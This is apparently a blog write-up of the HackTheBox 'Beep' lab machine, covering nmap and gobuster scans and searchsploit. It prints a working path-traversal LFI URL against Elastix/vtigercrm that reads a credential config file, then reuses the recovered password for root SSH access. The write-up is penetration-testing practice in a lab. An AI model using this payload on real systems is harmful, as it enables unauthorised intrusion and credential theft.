HacktheBox - Beep Writeup
02/11/2019

Zero to OSCP Hero Writeup #11 - Beep
Reconnaissance
1. Nmap Scan - TCP Scan
Let's start with a TCP scan of the target ip address to determine which ports are open and which services are running on those ports:
nmap -sC -sV -oA nmap/initial.tcp 10.10.10.7
- -sC: Run the default nmap script scan to find potential vulnerabilities
- -sV: Detect the service version
- -oA: Output the result of the scan in all formats as nmap/initial.tcp

Okay so there are a few ports open! There are the standard ports that are common on these boxes, SSH on Port 22 and HTTP on Port 80 but it also seems that there is mail server present on this machine with common mail ports and protcols in use, SMTP, Pop3, IMAP etc with what also seems like a webmin admin login portal on port 10000 and last but not least, mysql is also running on the machine.
2. Nmap Scan - All TCP Ports Scan
Okay, lets scan the entire TCP port range to confirm that there are no other ports open:
nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.7
- -sC: Run the default nmap script scan to find potential vulnerabilities
- -sV: Detect the service version
- -p-: Run the nmap scan against all ports
- -oA: Output the result of the scan in all formats as nmap/full.tcp
The full TCP scan confirmed that there are no additional ports open.
3. Nmap Scan - All UDP Ports Scan
We can do the same full port scan, but with the UDP ports:
nmap -sU -p- -oA nmap/full.udp 10.10.10.7
- -sU: Run the scan against UDP ports
- -p-: Run the nmap scan against all ports
- -oA: Output the result of the scan in all formats as nmap/full.tcp

The full UDP scan shows several ports open, including TFTP which is in an open|filtered state.
Enumeration - Port 80
1. Browse to 10.10.10.7
When we browse to 10.10.10.7 via http, it redirects us via port 443 to a https webpage that is showing a login portal for elastix.

2. Gobuster
As default credentials dont seems to work on the login panel and nothing of not in the page source code, lets run a gobuster on Port 80:
gobuster dir -k -u https://10.10.10.7/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
- dir: Indicate that we want to scan for directories
- -k: Skip SSL certificate verification
- -u: URL to scan
- -w: Wordlist to use for the directory search
After looking through some of the more inseresting directories like /config, the directory /vtigercrm catches my eye as it is another login panel.
3. Searchsploit
Again, as default credentials dont work for the /vtigercrm login panel, lets see if searchsploit can provide us with any help forward:
searchsploit elastix

After looking at several of these exploits, the 'graph.php' LFI exploit is one i want to look more into.
searchsploit -m exploits/php/webapps/37637.pl

So this LFI exploits the directory /vtigercrm!
Lets copy the LFI exploit link and see what it provides:
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Okay, so this looks a little messy, lets view the page source to make it easier to read!

Bingo! So this page lists the default freePBX database configuration, along with usernames and passwords!
As we can see, the default passwords have been changed to: jEhdIekWmdjE
Foothold - Root via LFI
After logging into freePBX with the changed password, there was no luck with gaining a foothold via the portal.
1. Logging into Beep via SSH
As SSH was running on the machine, I thought to try the password found from the config file to login via SSH... and it worked!
ssh root@10.10.10.7
jEhdIekWmdjE

We are root!
whoami&&id&&hostname

cat root.txt

and through the user fanis, we were able to grab the user.txt!
cat user.txt

What did I learn from Beep?
I enjoyed this box as it had multiple avenues for exploitation, via the LFI which i used or via port 10000 by utilising a blind payload in the user-agent field.
I think that this box is quite realistic as im sure that the same password is used for multiple accounts, of varying permissions, aswell as running out of date and vulnerable software!
Conclusion
Thanks for reading! Next up is Box #12 - Granny!
